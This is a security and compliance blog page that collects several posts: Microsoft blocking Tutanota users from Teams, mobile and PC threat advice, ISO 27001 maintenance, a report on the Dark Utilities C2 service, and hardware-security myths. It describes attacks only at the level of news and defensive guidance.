InfoSec and Compliance – With 20 years of blogging experience, DISC InfoSec blog is dedicated to providing trusted insights and practical solutions for professionals and organizations navigating the evolving cybersecurity landscape. From cutting-edge threats to compliance strategies, this blog is your reliable resource for staying informed and secure. Dive into the content, connect with the community, and elevate your InfoSec expertise!
Microsoft is actively blocking Tutanota email addresses from registering a Microsoft Teams account.
Tutanota is an end-to-end encrypted email app and a freemium secure email service, as of March 2017, Tutanota’s owners claimed to have over 2 million users.
The news is that Microsoft is actively blocking Tutanota email addresses from registering a Microsoft Teams account.
“Politicians on both sides of the Atlantic are discussing stronger antitrust legislation to regulate Big Tech – and such laws are badly needed as the blocking of Tutanota users from Microsoft Teams demonstrates. Big Tech companies have the market power to harm smaller competitors with some very easy steps like refusing smaller companies’ customers from using their own services.” reads a comment shared by the German email service provider. “Currently, Microsoft is actively blocking Tutanota email addresses from registering a Microsoft Teams account. This severe anti-competitive practice forces our customers to register a second email address – possibly one from Microsoft themselves – to create a Teams account.”
Microsoft doesn’t recognize the company as an email service but as a corporate address.
The first time that a Tutanota user registered a Teams account, its domain was recognized as a corporation, for this reason, any other users of the popular email service were not able to register its account and were requested to contact their admin.Â
“We repeatedly tried to solve the issue with Microsoft, but unfortunately our request was ignored”, says Matthias Pfau, co-founder of Tutanota.
“Microsoft would only have to change the settings that Tutanota is an email service so that everyone can register an individual account but they (Microsoft) say such a change is not possible.”
Let’s see if Microsoft will solve the issue, allowing 2 million users to use its MS Teams service.
We have build cybersecurity solution sheets for our clients which we would like to share with you. This can be a useful resource when there is a need to remediate risk. These are in pdf format which you can download.
You can choose the course based on your specific needs:
ISO 27001 Foundations course – you’ll learn about all of the standard’s requirements and the best practices for compliance.
ISO 27001 Internal Auditor course – besides the knowledge about the standard, you’ll also learn how to perform an internal audit in the company.
ISO 27001 Lead Auditor course – besides the knowledge about the standard, it also includes the training you need to become certified as a certification auditor.
ISO 27001 Lead Implementer course – besides the knowledge about the standard, it also includes the training you need to become an independent consultant for Information Security Management System implementation.
The online courses are suitable both for beginners and experienced professionals.
Learn at your preferred speed from any location at any time.
If you have any questions, feel free to send us an email to info@deurainfosec.com
Software Bill of Material and Vulnerability Management Blind Spots
Open source software is everywhere (which is not a bad thing in itself). However, many buyers don’t have inventory of open source components included in software products they are buying. Business even fail in keeping tack of open source components used in internally developed applications. As a result, vulnerability management programs have blind spots.
Take an inventory of open source software (standalone and libraries) and make it part of your vulnerability management program.
Why it matters:
Use of open source software is not bad in itself. Everyone uses open source software. The biggest examples are Linux and Apache server.
Many commercial software vendors use open source components but don’t properly and adequately disclose all open source components included in the commercial products.
Recent vulnerabilities (e.g. log4j) have far reaching impact.
Software applications developed in-house also include open source components. As these applications age and the initial developers move on to new jobs, older and vulnerable open source components may still stay in the applications unnoticed for long time.
What to do:
It is crucial to have an up-to-date inventory of all open source software, whether used as standalone products or embedded as a library inside a product. We can’t manage if we don’t know its existence.
Require your software vendors to provide you with a list of all open source libraries and their versions embedded into their products.
Make this list part of the vulnerability management program. Monitor release of new vulnerabilities and patches for your inventory of open source software components.
When building a bill of material for open source components, it is imperative to not only contact your software vendors but also review all software applications developed in-house. In some cases you may use source code scanning tools to build inventory of these components.
Here are the top phone security threats in 2022 and how to avoid them
Your handset is always at risk of being exploited. Here’s what to look out for.
Oscar Wong / Getty
Our mobile devices are now the keys to our communication, finances, and social lives — and because of this, they are lucrative targets for cybercriminals.
Whether or not you use a Google Android or Apple iOS smartphone, threat actors are constantly evolving their tactics to break into them.
This includes everything from basic spam and malicious links sent over social media to malware capable of spying on you, compromising your banking apps, or deploying ransomware on your device.
The top threats to Android and iOS smartphone security in 2022
Phishing and smishing
Image: Maria Diaz / ZDNet
Phishing occurs when attackers send you fake and fraudulent messages. Cybercriminals attempt to lure you into sharing personal information, clicking malicious links, downloading and unwittingly executing malware on your device, or handing over your account details — for a bank, PayPal, social network, email, and more.
Mobile devices are subject to phishing through every avenue PCs are, including email and social network messages. However, mobile devices are also vulnerable to smishing, which are phishing attempts sent over SMS texts.
Regarding phishing, it doesn’t matter if you are using an Android or an iOS device. To fraudsters and cybercriminals, all mobile devices are created equally.
Your best defense: Don’t click on links in emails or text messages unless you can be 100% they’re legit.
Physical security
Image: Maria Diaz / ZDNet
Many of us forget an essential security measure: physically securing our mobile devices. We may not use a PIN, pattern, or a biometric check such as a fingerprint or retina scan — and if so, we are making our handset vulnerable to tampering. In addition, if you leave your phone unattended, it may be at risk of theft.
Your best defense:Â Lock down your phone with a strong password or PIN number, at a minimum, so that if it ends up in the wrong hands, your data and accounts can’t be accessed.
SIM hijacking
Image: Maria Diaz / ZDNet
SIM hijacking, also known as SIM swapping or SIM porting, is the abuse of a legitimate service offered by telecom firms when customers need to switch their SIM and telephone numbers between operators or handsets.
Usually, a customer would call their telecom provider and request a switch. An attacker, however, will use social engineering and the personal details they discover about you — including your name, physical address, and contact details — to assume your identity and to dupe customer service representatives into giving them control of your number.
In successful attacks, a cybercriminal will be able to redirect your phone calls and texts to a handset they own. Importantly, this also means any two-factor authentication (2FA) codes used to protect your email, social media, and banking accounts, among others, will also end up in their hands.Â
SIM hijacking usually is a targeted attack as it takes data collection and physical effort to pull off. However, when successful, they can be disastrous for your privacy and the security of your online accounts.
Your best defense: Protect your data through an array of cybersecurity best practices so that it can’t be used against you via social engineering. Consider asking your telecom provider to add a “Do not port” note to your file (unless you visit in person).
Nuisanceware, premium service dialers, cryptocurrency miners
Image: Maria Diaz / ZDNet
Your mobile device is also at risk of nuisanceware and malicious software that will force the device to either make calls or send messages to premium numbers.
Nuisanceware is malware found in apps (more commonly in the Android ecosystem in comparison to iOS) which makes your handset act annoyingly. Usually not dangerous but still irritating and a drain on your power, nuisanceware may show you pop-up adverts, interrupt your tasks with promotions or survey requests, or open up pages in your mobile browser without permission.
While nuisanceware can generate ad impressions through users, premium service dialers are worse. Apps may contain hidden functions that will covertly sign you up to premium, paid services, send texts, or make calls — and while you end up paying for these ‘services,’ the attacker gets paid.
Some apps may quietly steal your device’s computing resources to mine for cryptocurrency.
Your best defense:Â Only download apps from legitimate app stores and carefully evaluate what permissions you’re allowing them to have.Â
Open Wi-Fi
Image: Maria Diaz / ZDNet
Open and unsecured Wi-Fi hotspots are everywhere, from hotel rooms to coffee shops. They are intended to be a customer service, but their open nature also opens them up to attack.
Specifically, your handset or PC could become susceptible to Man-in-The-Middle (MiTM) attacks through open Wi-Fi connections. An attacker will intercept the communication flow between your handset and browser, stealing your information, pushing malware payloads, and potentially allowing your device to be hijacked.
You also come across ‘honeypot’ Wi-Fi hotspots every so often. These are open Wi-Fi hotspots created by cybercriminals, disguised as legitimate and free spots, for the sole purpose of performing MiTM.
Your best defense: Avoid using public Wi-Fi altogether and use mobile networks instead. If you must connect to them, at least consider using a virtual private network (VPN).
Surveillance, spying, and stalkerware
Image: Maria Diaz / ZDNet
Surveillanceware, spyware, and stalkerware come in various forms. Spyware is often generic and will be used by cyberattackers to steal information including PII and financial details. However, surveillanceware and stalkerware are normally more personal and targeted; for example, in the case of domestic abuse, a partner may install surveillance software on your phone to keep track of your contacts, phone calls, GPS location, and who you are communicating with, and when.
Your best defense: An antivirus scan should take care of generic spyware, and while there’s no magic bullet for surveillanceware or stalkerware, you should watch out for any suspicious or unusual behavior on your device. If you think you are being monitored, put your physical safety above all else. See our guide for how to find and remove stalkerware from your phone.
Ransomware
Image: Maria Diaz / ZDNet
Ransomware can impact mobile devices as well as PCs. Ransomware will attempt to encrypt files and directories, locking you out of your phone, and will demand payment — commonly in cryptocurrency — through a blackmail landing page. Cryptolocker and Koler are prime examples.
Ransomware is often found in third-party apps or deployed as a payload on malicious websites. For example, you may see a pop-up request to download an app — disguised as everything from a software cracker to a pornography viewer — and your handset can then be encrypted in mere minutes.
Your best defense: Keep your phone up-to-date with the latest firmware, your Android or iOS handset’s fundamental security protections on, and don’t download apps from sources outside official repositories.
Trojans, financial malware
By Rawpixel.com — Shutterstock
There are countless mobile malware variants, but Google and Apple’s fundamental protections stop many in their tracks. However, out of the malware families, you should be aware of, trojans top the list.
Trojans are forms of malware that are developed with data theft and financial gains in mind. Mobile variants include EventBot, MaliBot, and Drinik.
Most of the time, users download the malware themselves, which may be packaged up as an innocent and legitimate app or service. However, once they have landed on your handset, they overlay a banking app’s window and steal the credentials you submit. This information is then sent to an attacker and can be used to pillage your bank account. Some variants may also intercept 2FA verification codes.
The majority of financial trojans target Android handsets. iOS variants are rarer, but strains including XCodeGhost still exist.
Your best defense:Â Keep your phone up-to-date with the latest firmware, your Android or iOS handset’s fundamental security protections on, and don’t download apps from sources outside official repositories. If you suspect your phone has been compromised, stop using financial apps, cut off your internet connection, and both run a personal check and antivirus scan.
Mobile device management exploits
Image: Maria Diaz / ZDNet
Mobile Device Management (MDM) solutions are enterprise-grade tools suited for the workforce. MDM features can include secure channels for employees to access corporate resources and software, spreading a company’s network security solutions and scans to each endpoint device, and blocking malicious links and websites.
However, if the central MDM solution is infiltrated or otherwise compromised, each mobile endpoint device is also at risk of data left, surveillance, or hijacking.
Your best defense:Â The nature of MDM solutions takes control out of the hands of end users. Therefore, you can’t protect against MDM compromise. What you can do, however, is maintain basic security hygiene on your device, make sure it is up-to-date, and keep your personal apps and information off work devices.Â
How can I physically protect my device?
Your lock screen is the gateway to your device, data, photos, private documents, and apps. As such, keeping it secure is paramount.
On Android, consider these settings:
Screen lock type: Swipe, pattern, PIN, password, and biometric checks using fingerprints or your face
Smart lock: Keeps your phone unlocked when it is with you, and you can decide what situations are considered safe
Auto factory resets: Automatically wipes your phone after 15 incorrect attempts to unlock
Notifications: Select what notifications show up and what content is displayed, even when your phone is locked
Lockdown mode: From Android 9.0, lockdown mode can be enabled
Find my Device: Find, lock, or erase your lost device
On iOS devices, check out:
Passcode: set a passcode to unlock your device
Face ID, Touch ID: Biometrics can be used to unlock your device, use apps, and make payments
Find my iPhone: Find, track, and block your lost iPhone
Lockdown mode: Apple previewed its own version of lockdown mode in July. Dubbed “extreme” protection for a small pool of users, the upcoming feature will provide improved security for malicious links and connections, as well as wired connections when an iPhone is locked.Â
What should I look out for as symptoms of a malware infection?
If you notice your Android or iOS device is not behaving normally, you may have been infected by malware or be otherwise compromised.
Things to watch out for are:
Battery life drain: Batteries degrade over time, especially if you don’t let your handset run flat every so often or you are constantly running high-power mobile apps. However, if your handset is suddenly hot and losing power exceptionally quickly, this could signify malicious apps and software burning up your resources.
Unexpected behavior: If your smartphone is behaving differently and you’ve recently installed new apps or services, this could indicate that all is not well.
Unknown apps: Software that suddenly appears on your device, especially if you have allowed the installation of apps from unidentified developers or have a jailbroken smartphone, could be malware or surveillance apps that have been installed without your knowledge or consent.
Browser changes: Browser hijacking, changes to a different search engine, web page pop-ups, and ending up on pages you didn’t mean to could all be a sign of malicious software tampering with your device and data.
Unexpected bills: Premium number scams and services are operated by threat actors to generate fraudulent income. If you have unexpected charges, calls, or texts to premium numbers, this could mean you are a victim of these threats.
Service disruption: SIM hijacking is a severe threat. This is normally a targeted attack with a particular goal, such as stealing your cryptocurrency or accessing your online bank account. The first sign of attack is that your phone service suddenly cuts off, which indicates your telephone number has been transferred elsewhere. A lack of signal, no ability to call, or a warning that you are limited to emergency calls only can indicate a SIM swap has taken place. Furthermore, you may see account reset notifications on email or alerts that a new device has been added to your existing services.
What about Pegasus and government-grade malware?
On occasion, enterprise and government-grade malware hit the headlines. Known variants include Pegasus and Hermit, used by law enforcement and governments to spy on everyone from journalists to lawyers and activists.
In June 2022, Google Threat Analysis Group (TAG) researchers warned that Hermit, a sophisticated form of iOS and Android spyware, is exploiting zero-day vulnerabilities and is now in active circulation.
The malware tries to root devices and capture every detail of a victim’s digital life, including their calls, messages, logs, photos, and GPS location.
However, the likelihood of you being targeted by these expensive, paid-for malware packages is low unless you are a high-profile individual of interest to a government willing to go to these lengths. You are far more likely to be targeted by phishing, generic malware, or, unfortunately, friends and family members who are using stalkerware against you.
What should I do if I think my Android or iOS phone is compromised?
If you suspect your Android or IOS device has been infected with malware or otherwise compromised, you should take urgent action to protect your privacy and security. Consider these steps below:
Run a malware scan: You should ensure your handset is up-to-date with the latest operating system and firmware, as updates usually include patches for security vulnerabilities that can be exploited in attacks or malware distribution. Google and Apple offer security protection for users, but it wouldn’t hurt to download a dedicated antivirus app. Options include Avast, Bitdefender, and Norton. Even if you stick to the free versions of these apps, it’s far better than nothing.
Delete suspicious apps: Deleting strange apps isn’t foolproof, but any apps you don’t recognize or use should be removed. In the cases of nuisanceware, for example, deleting the app can be enough to restore your handset to normal. You should also avoid downloading apps from third-party developers outside of Google Play and the Apple Store that you do not trust.
Revisit permissions: From time to time, you should check the permission levels of apps on your mobile device. If they appear to be far too extensive for the app’s functions or utilities, consider revoking them or deleting the app entirely. Keep in mind that some developers, especially in the Android ecosystem, will offer helpful utilities and apps in Google Play only to turn them malicious down the line.
Tighten up communication channels: You should never use open, public Wi-Fi networks. Instead, stick to mobile networks; if you don’t need them, turn off Bluetooth, GPS, and any other features that could broadcast your data.
Premium service dialers: If you’ve had unexpected bills, go through your apps and delete anything suspicious. You can also call your telecom provider and ask them to block premium numbers and SMS messages.
Ransomware: There are several options if you have unfortunately become the victim of mobile ransomware and cannot access your device.
If you were alerted to the ransomware before your device is encrypted and a ransom note is displayed, cut off the internet and any other connections — including any wired links to other devices — and boot up your mobile in Safe Mode. You might be able to delete the offending app, run an antivirus scan, and clean up before any significant damage occurs.
However, if your handset is locked, your next steps are more limited, as removing the malware only deals with part of the problem.
If you know what ransomware variant is on your handset, you can try using a decryption tool such as those listed by the No More Ransom project. You can also provide information to Crypto Sheriff, and researchers will try and find out what type of malware you’re dealing with for free.
In the worst-case scenario, you might need to perform a factory reset. Removing ransomware stops it from spreading further but will not restore files that have been encrypted. You can restore your device following a reset if you’ve consistently backed up your data.
Remember, paying a ransom does not guarantee that your files will be decrypted and returned to you.
Stalkerware, surveillanceware: When you know or suspect you’ve been targeted by stalkerware or surveillanceware, this can be extremely difficult to handle. If it’s the case that basic, generic spyware has landed on your device, Google, Apple, or a dedicated antivirus app should pick this up for you and remove it.
However, suppose a partner or other close contact is monitoring you, and you try to remove a stalkerware app from your phone. In that case, they will be alerted directly, or they will become aware because they are no longer receiving your information.
You shouldn’t try to remove these apps if this risks your physical safety. Indeed, some commercially-available forms of spyware damage a handset so severely that the operator can remotely reinstall them, anyway, and the only real option is to throw the device away (or keep it for law enforcement purposes).
Reach out to an organization that can help you, consider using a burner phone if you can, and keep yourself as physically safe as possible.Â
SIM hijacking: If you suspect you have been SIM-swapped, you have a very short window for damage control. The first thing you should do is call your telecom provider and try to have your service restored as quickly as possible — but as we all know, you can be left on hold for an infuriatingly long time.
If you can, go and visit your carrier in person, in-store.
No one is exempt from the risk of SIM swaps, customer service representatives may not have been trained to recognize SIM hijacking, and cybercriminals may have enough of your personal information to pass as you without challenge.
To mitigate the risk in the first place, consider linking your crucial ‘hub’ accounts, financial services, and cryptocurrency wallets to a number that isn’t publicly connected to you. A simple pay-as-you-go number will do, and so if your personal or work numbers are compromised, the potential opportunities for theft are limited.Â
Whether you’re a small organisation with limited resources or an international firm, achieving ISO 27001 certification will be a challenge.
Anyone who has already been through the process will know that. You must assemble a team, conduct a gap analysis and risk assessment, apply security controls, create documentation and perform staff awareness training. And that’s before you even get into internal audits and certification audits.
To make matters more complicated, once you’ve certified to ISO 27001, you must maintain your compliance status and regularly recertify.
Organisations must do this to ensure that they have maintained their compliance practices and accounted for changes in the way they operate.
In this blog, we look at the key issues you must address if you are to maintain ISO 27001 compliance.
How often do you need recertify to ISO 27001?
An organisation’s ISO 27001 certification lasts three years. The certificate itself will state the date at which certification was issued and when it will expire.
As that day approaches, the organisation must apply for recertification. This can be with the same body that performed the initial audit or it can be with another registrar.
How to maintain ISO 27001 certification
Organisations can ensure that their ISO 27001 practices remain compliant by following these seven steps.
1.Continually test and review risks
Your ISMS (information security management system) was built to address risks that you identified during the certification process, but the threat landscape is constantly evolving.
As such, you must regularly monitor the risks you face to ensure that your defences are adequate. Part of this process will involve vulnerability scans and other tools that can automatically spot new risks. However, you should also perform more rigorous tests on a regular basis.
To remain compliant, you must complete an ISO 27001 risk assessment at least once a year or whenever you make substantial changes to your organisation.
You can use the results of the assessment to determine whether your controls work as intended and whether additional defences should be adopted.
2.Keep documentation up to date
The policies and processes you wrote during the initial implementation will have been created specifically for the way your organisation operated at that time.
However, your operations will no doubt evolve and you need to ensure that your documentation takes that into account. Have you made a significant change in the way you perform certain actions? Have you undertaken new activities involving sensitive data? Has the physical premises changed in any way?
If the answer to any of those questions is yes, then you must amend your documentation accordingly.
3.Perform internal audits
An internal audit provides a comprehensive review of the effectiveness of your ISMS. Alongside a risk assessment and a documentation review, it will help you assess the status of your ISO 27001 compliance.
You will have conducted an internal audit as part of your initial certification process, so you should already have the framework to hand, which you can repeat as part of your compliance maintenance.
4.Keep senior management informed
Unless you are extremely lucky, the maintenance practices outlined above will reveal weaknesses that you must address if you are to remain compliant.
Remedying those vulnerabilities will take time and resources, which requires you to gain board-level approval. As such, you should keep senior management informed of both your activities maintaining the ISMS and the benefits that it has brought.
For example, your defences might have played a direct role in preventing a data breach or cyber attack. If so, you should have logged and investigated the event, in which case you’ll have proof of the ISMS’s effectiveness that you can bring to the board.
An ISMS isn’t just about preventing security breaches, though. It also helps organisations operate more efficiently and responsibly. You should also provide evidence of this, presenting key performance indicators and interviews with employees and other stakeholders.
5.Establish a regular management review process
In addition to informing the board of the ISMS’s successes, you should also involve them in the review process. This is where you can discuss opportunities for improvement or necessary changes that must be made.
There is no requirement for how often the management review should take place, but it should be at least once a year and ideally every six months.
6.Stay on top of corrective actions
If there’s a theme to these tips, it’s that your ISMS isn’t set in stone. As such, it should evolve to meet the threats that your organisation faces.
By regularly monitoring the effectiveness of your ISMS, you should be able to perform corrective actions that prevent weaknesses from spilling over into major problems. Some of these changes could be minor tweaks to processes and policies, or the addition of a new tool.
However, some corrective actions will require a significant overhaul of your practices. These should be discussed during the management review process and could involve ongoing adjustments and monitoring.
7.Promote ongoing information security staff awareness
One of the key principles of ISO 27001 is that effective information security is everybody’s responsibility. Compliance should not be left to the IT department or managers.
Anyone in the organisation that handles sensitive data plays a role in the organisation’s security. They must understand their obligations for protecting sensitive information and appreciate the stakes involved.
You are required to provide staff awareness training as part of your certification process, but those lessons should be repeated on a regular basis. As with your management review, it should be at least annually but ideally twice yearly.
For organisations looking for a quick and effective way to meet their staff awareness training requirements, IT Governance is here to help.
With this 45-minute training course, you can enable your employees to demonstrate their competence in information security and ISO 27001 with digital badges.
The package comes with an annual licence, making it quick and easy to refresh employees’ knowledge on a regular basis.
Security researchers found a new service called Dark Utilities that provides an easy and inexpensive way for cybercriminals to set up a command and control (C2) center for their malicious operations.
The Dark Utilities service provides threat actors a platform that supports Windows, Linux, and Python-based payloads, and eliminates the effort associated with implementing a C2 communication channel.
A C2 server is how adversaries control their malware in the wild, sending out commands, configurations and new payloads, and receiving data collected from compromised systems.
The Dark Utilities operation is a ‘C2-as-a-service’ (C2aaS) that advertises reliable, anonymous C2 infrastructure and all the required additional functions for a starting price of just EUR 9,99.
A report from Cisco Talos says that the service has around 3,000 active subscribers, which would bring the operators a revenue of about EUR 30,000.
Dark Utilities login portal (Cisco)
Dark Utilities emerged in early 2022 and offers full-blown C2 capabilities both on the Tor network and on the clear web. It hosts payloads in the Interplanetary File System (IPFS) – a decentralized network system for storing and sharing data.
Multiple architectures are supported and it appears that the operators are planning on expanding the list to provide a larger set of options of devices that could be targeted.
Platform selection on payload screen (Cisco)
Cisco Talos researchers say that selecting an operating system generates a command string that “threat actors are typically embedding into PowerShell or Bash scripts to facilitate the retrieval and execution of the payload on victim machines.”
The selected payload also establishes persistence on the target system by creating a Registry key on Windows, or a Crontab entry or a Systemd service on Linux.
According to the researchers, the administrative panel comes with multiple modules for various types of attack, including distributed denial-of-service (DDoS) and cryptojacking.
With tens of thousands of threat actors already subscribed and the low price, Dark Utilities is likely to attract an even larger crowd of less-skilled adversaries.
Just over a year ago, we wrote about a “cybersecurity researcher” who posted almost 4000 pointlessly poisoned Python packages to the popular repository PyPI.
This person went by the curious nickname of Remind Supply Chain Risks, and the packages had project names that were generally similar to well-known projects, presumably in the hope that some of them would get installed by mistake, thanks to users using slightly incorrect search terms or making minor typing mistakes when typing in PyPI URLs.
These pointless packages weren’t overtly malicious, but they did call home to a server hosted in Japan, presumably so that the perpetrator could collect statistics on this “experiment” and write it up while pretending it counted as science.
A month after that, we wrote about a PhD student (who should have known better) and their supervisor (who is apparently an Assistant Professor of Computer Science at a US university, and very definitely should have known better) who went out of their way to introduce numerous apparently legitimate but not-strictly-needed patches into the Linux kernel.
They called these patches hypocrite commits, and the idea was to show that two peculiar patches submitted at different times could, in theory, be combined later on to introduce a security hole, effectively each contributing a sort of “half-vulnerability” that wouldn’t be spotted as a bug on its own.
As you can imagine, the Linux kernel team did not take kindly to being experimented on in this way without permission, not least because they were faced with cleaning up the mess:
Please stop submitting known-invalid patches. Your professor is playing around with the review process in order to achieve a paper in some strange and bizarre way. This is not ok, it is wasting our time, and we will have to report this, AGAIN, to your university…
Whether you are getting ready for back-to-school season, getting new work laptop or fancying a new gamer’s pc, learn the steps to protect your new PC from cyberthreats.
With Windows 11 making headlines for all the right reasons, it could be a great time to invest in a new PC for the family or the home office. But any new household computing device should come with an attendant safety warning. Hackers will be after your data the minute it’s connected to the internet. And they have numerous ways to get it.
That’s why you need to think about cybersecurity even before plugging your machine in and switching it on. Take time out now to refresh your memory and make cyber-hygiene a number one priority.
What are the main threats to my PC?
As soon as you’re connected to the internet, malicious actors will be looking to steal your data, encrypt and hold your machine ransom, lift financial details, secretly mine for cryptocurrency, and much more. They’ll do so via some tried and true methods, which often rely on cracking, stealing or guessing passwords, or exploiting software vulnerabilities. Top threats include:
Phishing: One of the oldest con tricks in the book. Cybercriminals masquerade as legitimate and trustworthy sources (banks, tech providers, retailers etc) and try to persuade users into clicking on links and/or opening attachments in emails. Doing so will take users to a spoofed site requesting that they fill in personal information (like logins and/or address/financial details) or could trigger a covert malware download.
Drive-by downloads and malicious ads: Sometimes merely visiting an infested website or a site running a malicious ad could trigger a malware download. We may think that well-known sites may be less compromised in this way as they are better resourced and can afford enhanced protection. But there have been plenty of counter-example through the years showing that it’s not always the case. That’s why its essential to invest in security software from a reputable provider and ensure that your browser’s security settings are correct.
Digital skimming: Hackers may also compromise the payment pages of e-commerce sites with malware designed to silently harvest your card data as it is entered. This is difficult to guard against as the issue is with the provider. However, shopping with better-known sites can reduce risk. Malicious apps and files: Cybercriminals also hide malware inside legitimate-looking applications and downloads. Many of these are posted to online forums, P2P sites, and other third-party platforms. That’s why it makes sense to download only from trusted sources, and to use an effective security software tool to scan for malicious software.
Ten tips to keep your computer safe
Many of the below steps may be taken care of automatically by your PC manufacturer/Microsoft, but it pays to dig a little deeper to make sure all the settings are as secure as you need them to be. Here are our top 10 tips for computer safety:
Apply automatic updates for the OS and any software running on the PC
Remove bloatware that often comes with PCs. Check beforehand if you don’t recognize any software to ensure removing it won’t degrade the performance. The fewer pieces of software on the machine, the less opportunity for attackers to exploit bugs in it
Install multi-layered security software from a reputable third-party vendor and keep it up to date
Configure backups, and ideally back up a copy of data to a remote storage device kept offline
Secure the browser by adjusting privacy and security settings and ensuring it is on the latest version
Switch on and configure your firewall on the OS and home router, ensuring it is protected with a strong password
Download a multi-factor authentication app in order to help protect your accounts from being hijacked via phishing and other attacks
Avoid using USBs that you don’t own, in case they are loaded with malware
Use a password manager to ensure that all your credentials are unique, strong, and hard-to-crack
Only download apps/files from trusted sources and avoid pirated material, which can often be booby-trapped with malware
It goes without saying that, even by following these best practices, you could still be at risk when browsing online. Always proceed with caution, don’t reply to unsolicited emails/online messages, and ensure device encryption is switched on.
Internet attack on computer systems is pervasive. It can take from less than a minute to as much as eight hours for an unprotected machine connected to the Internet to be completely compromised. It is the information security architect’s job to prevent attacks by securing computer systems. This book describes both the process and the practice of assessing a computer system’s existing information security posture. Detailing the time-tested practices of experienced security architects, Securing systems explains how to deliver the right security at the right time in the implementation lifecycle.
Many experts often overlook hardware based security and its vital importance in establishing a secure workspace.
When it comes to cybersecurity, everyone likes to talk about software and the dangers that it poses. However, people often overlook hardware-based security and its vital importance in establishing a secure workspace. This is attributed to a general lack of knowledge when it comes to hardware security and how it works. So, it’s time to bust some myths that you might think are true when it comes to hardware security.
Myth #1: We never hear about hardware-based attacks, they don’t exist!
Just because you don’t hear about the problem frequently, it doesn’t mean that it doesn’t exist. Usually, cyberattacks that make the headlines are those involving large corporations that have fallen victim to a software-based attack carried out by infamous cybercrime syndicates. These stories are juicy and scandalous and entice audiences to read the article, generating more clicks onto the media outlet’s website. Additionally, many businesses choose to withhold information pertaining to hardware-based attacks as it indicates insufficient physical security, which reflects negatively upon the business. Another reason why you don’t often hear about hardware-based attacks is that enterprises who fall victim to them are oblivious to it. When an enterprise gets breached, the natural assumption is that it was due to a software vulnerability or phishing scam. Such misunderstanding, coupled with a lack of resources to detect a hardware attack tool, results in the attack method getting misconstrued.
However, that is not to say that hardware-based attacks don’t receive any media attention. A great example that receives public resonance concerns ATMs. These cash dispensing machines are becoming a go-to target for cybercriminals because of the instant payout. Instead of using brute force attacks on ATMs, cybercriminals can now just attach a hardware attack tool, known as a Black Box, to the internal computer to trick it into releasing cash through a MiTM attack. Since 2021, Black Box attacks have been on the rise and have amounted to losses of 1.5 million Euros in Europe alone.
Myth #2: We have security measures in place, and all our employees use VPNs– we are protected!
Yes, your security measures like NAC, IDS/IDP, firewalls and VPNs definitely provide some level of protection. However, malicious actors are continually evolving and finding new attack methods, which means exploiting blind spots, one of which is the hardware domain. Existing security solutions lack visibility into the Physical Layer (Layer 1), leaving them unfit to defend against, let alone identify, hardware-based attack tools. These malicious devices are designed to evade detection by operating on the Physical Layer and mimic human-like commands and executions, making them extremely dangerous as they can carry out a variety of harmful attacks without any obstacles in their way. If you are unable to determine all your assets’ hardware information within 10 seconds, you are, in fact, not protected.
Myth #3: “We don’t use USBs, so why should it concern us”
That’s a line we’ve heard many times before, but here’s the thing: you do, and it should!
Sure, your organization might not use flash drives and there might be some authorization capabilities in EPS/EDR solutions that block phones, keyboards and mice with certain VID/PIDs. That’s great, but what about the keyboards employees use to type? And the mice they use to navigate? Correct, those are USBs. They might be authorized, but that doesn’t mean they can’t get impersonated by a covert spoofing device. So long as there are HIDs in the work environment, there is the risk that one (or more) may be illegitimate. And without Physical Layer visibility, there’s no mechanism in place to determine what’s legitimate or not.
Myth #4: Why would anyone want to hack us; we aren’t an interesting target?
That’s where you’re wrong. In today’s day and age, almost anything that has data is of value and there is someone out there who wants to access it, no matter how mundane it could be. Not all hackers target large nuclear facilities or governmental institutions; the risk is usually too high for most cybercriminals. Your company, however, is a prime target – there’s data and it’s accessible. Whether the perpetrator wants to steal information for monetary gain, access it to gain a competitive advantage, or encrypt it in a ransomware attack, your company provides that opportunity and a hardware attack tool can do the job.
In short, every enterprise is a target for malicious actors; it can happen to anyone for any number of reasons. The important thing to remember is that you can prepare and build your company’s resistance to these attacks by gaining visibility on the Physical Layer through hardware-based security.
About the author: Julien Katzenmaier, Content Writer at Sepio
Pegasus is listening: Q&A with Paul Rusesabagina’s daughter Carine Kanimba
You may not recognize the name Carine Kanimba, but you have probably heard of her dad: Paul Rusesabagina. He was the manager of Hôtel des Milles Collines and rather famously decided to shelter some 1,200 mostly Tutsi Rwandans in his hotel during the 1994 genocide in Rwanda. Don Cheadle played him in the movie Hotel Rwanda.
After, Rusesabagina became a superstar ambassador of human rights. He wrote an autobiography about his work during the genocide; President George W. Bush awarded him the Medal of Freedom; and he went on the speakers’ circuit not just talking about 1994 – but criticizing the current government of President Paul Kagame for trampling on human rights.
In August 2020, Rusesabagina boarded a private jet for what he thought would be a trip to Burundi, but instead he was rendered to Rwanda. He’s since been sentenced to 25-years in prison.
Carine Kanimba was on Capitol Hill last week to talk not just about her dad (who adopted sisters Carine and Anaïse shortly after the genocide), but also her recent discovery that she’s been targeted by a commercial spyware program called Pegasus. And she believes the Rwandan government was behind it.
Pegasus spyware is the brainchild of an Israeli company called NSO Group and it has been found on the phones of so many activists around the world it has become a kind of cautionary tale about the commercial spyware industry. It has been linked to the murder of journalist Jamal Khashoggi, discovered on the phones of Mexican opposition leaders, Catalonian politicians, and journalists and lawyers around the world. (In a statement, NSO Group told Click Here that it “thoroughly investigates any claim for illegal use of its technology by customers, and terminates contracts when illegal use is found.”)
The Click Here podcast sat down with Kanimba shortly after her Congressional testimony to talk to her about her role as a human rights advocate, what it is like finding oneself on the receiving end of a spyware campaign, and why she is confident she will win her father’s release. The interview has been edited and shortened for clarity.
CLICK HERE: We wanted to start by saying we’re very sorry about what you’re going through with your father…
According to a new Tessian report, 30% employees do not think they personally play a role in maintaining their company’s cybersecurity posture.
What’s more, only 39% of employees say they’re very likely to report a security incident, making investigation and remediation even more challenging and time-consuming for security teams. When asked why, 42% of employees said they wouldn’t know if they had caused an incident in the first place, and 25% say they just don’t care enough about cybersecurity to mention it.
Virtually all IT and security leaders agreed that a strong security culture is important in maintaining a strong security posture. Yet, despite rating their organization’s security 8 out 10, on average, three-quarters of organizations experienced a security incident in the last 12 months.
The report suggests this could stem from a reliance on traditional training programs; 48% of security leaders say training is one the most important influences on building a positive security posture. But the reality is that employees aren’t engaged; just 28% of UK and US workers say security awareness training is engaging and only 36% say they’re paying full attention. Of those who are, only half say it’s helpful, while another 50% have had a negative experience with a phishing simulation. With recent headlines depicting how phishing simulations can go awry, negative experiences like these further alienate employees and decrease engagement.
